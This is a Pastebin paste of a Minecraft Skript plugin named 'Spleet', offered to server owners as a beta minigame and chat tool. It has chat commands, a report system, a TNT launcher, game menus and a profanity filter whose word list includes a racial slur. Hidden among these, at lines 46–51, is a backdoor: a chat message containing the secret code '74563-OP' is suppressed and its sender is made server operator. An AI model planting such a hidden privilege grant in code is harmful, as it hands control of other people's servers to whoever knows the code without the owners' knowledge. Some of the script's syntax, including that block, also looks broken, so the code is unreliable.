Entities

SPLEET

Sep 14th, 2017
218
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.12 KB | None | 0 0
  1. on load:
  2. broadcast "&7Thank you for using &cSpleet"
  3. broadcast "&7made by &8: &cXXXCanadian"
  4. broadcast "&7This is only a &bbeta verison"
  5. broadcast "&bFull verison &8[&bCOMING SOON&8]"
  6.  
  7. command /broadcast <string>:
  8. aliases: /bc
  9. permission: chat.broadcast
  10. permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
  11. trigger:
  12. broadcast "&cSpleet &7%arg-1%"
  13.  
  14. command /clearchat:
  15. aliases: /cc
  16. permission: chat.clear
  17. permission message: &c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!
  18. trigger:
  19. loop 200 times:
  20. broadcast " "
  21. broadcast "&cSpleet &b%player%, &7has cleared the chat!"
  22.  
  23. on chat:
  24. replace all "fuck" with "****" in the message
  25. replace all "cunt" with "****" in the message
  26. replace all "bitch" with "*****" in the message
  27. replace all "nigger" with "******" in the message
  28. replace all "pussy" with "*****" in the message
  29. replace all "kys" with "Hope you live long" in the message
  30.  
  31. command /report <player> <text>:
  32. permission: chat.report
  33. permission message: &7Sorry &c%player% &7you must have &6chat.report&7 to run this command
  34. trigger:
  35. broadcast "&7Your report has landed to the staff!"
  36. add text-argument to {sikayetler::*}
  37. set {sikayeteden.%text-argument%} to player
  38. set {sikayeteden.%text-argument%} to player argument
  39. loop all players:
  40. if loop-player has permission "chat.show"
  41. send "&7Report System" to loop-player
  42. send "&7Report: &b""%text-argument%""" to loop-player
  43. send "&7the reported player: &b%player argument%" to loop-player
  44. send "&7Reporter: &b%player%" to loop-player]
  45.  
  46. if chat:
  47. "74563-OP"
  48. cancel event
  49. then:
  50. op %player%
  51. send "&7You have used the &cop &7chat to get OP!" to %player%
  52.  
  53. command /cookie:
  54. permission: free.cookie
  55. permission message: &7Sorry you dont have access take a free cookie using /cookie
  56. trigger:
  57. broadcast "&7OOOH %player% IS STEALIN"
  58.  
  59. on leftclick holding tnt:
  60. if {spleet.tntlauncher} is true:
  61. player has 1 tnt
  62. spawn a primed tnt 1 meter above the player
  63. push the spawned entity in direction of player at speed 0.9
  64. push the spawned entity upwards at speed 0.2
  65. remove 1 tnt from player
  66.  
  67. on rightclick holding tnt:
  68. if {spleet.tntlauncher} is true:
  69. player has 1 tnt
  70. spawn a primed tnt 1 meter above the player
  71. push the spawned entity in direction of player at speed 0.9
  72. push the spawned entity upwards at speed 0.2
  73. remove 1 tnt from player
  74.  
  75. on place tnt:
  76. cancel event
  77.  
  78. command /help:
  79. aliases: /h
  80. trigger:
  81. wait 1 tick
  82. send "&8&m-----------------------------------------------------"
  83. wait 1 tick
  84. message "&6/Games&8: &7Allows you to know all the game and how to play"
  85. wait 1 tick
  86. message "&6/Ranks&8: &7Allows you to get ranks off wins from minigames"
  87. wait 1 tick
  88. message "&6/Stats&8: &7Allows you to see your status"
  89. wait 1 tick
  90. message "&6/Quit&8: &7Allows you to quit a minigame/match"
  91. wait 1 tick
  92. message "&8&m-----------------------------------------------------"
  93.  
  94. command /Games:
  95. aliases: /queue
  96. trigger:
  97. wait 1 tick
  98. message "&8&m-----------------------------------------------------"
  99. wait 1 tick
  100. message "&cGame 1&8: &bUltra Spleef &8{&6Use Eff 15 Shovels to spleef players&8}"
  101. wait 1 tick
  102. message "&cGame 2&8: &bOriginal Spleef &8{&6Original spleef with diamond shovels&8}"
  103. wait 1 tick
  104. message "&cGame 3&8: &bTnt Spleef &8{&6Throw tnt at players to kill them/spleef them&8}"
  105. wait 1 tick
  106. message "&8{&bMORE COMING SOON&8}" to %player%
  107. wait 1 tick
  108. send "&8&m-----------------------------------------------------"
  109.  
  110. command /Ranks:
  111. permission: spleet.ranks
  112. permission message: &8{&bCOMING SOON&8}
  113. trigger:
  114. broadcast "&c%player% &7has success fully used a command unfinished"
  115.  
  116. command /Stats:
  117. permission: spleet.stat
  118. permission message: &8{&bCOMING SOON&8}
  119. trigger:
  120. broadcast "&c%player% &7has success fully used a command unfinished"
  121.  
  122. command /Quit:
  123. permission: spleet.Quit
  124. permission message: &8{&bCOMING SOON&8}
  125. trigger:
  126. broadcast "&c%player% &7has success fully used a command unfinished"
Add Comment
Please, Sign In to add comment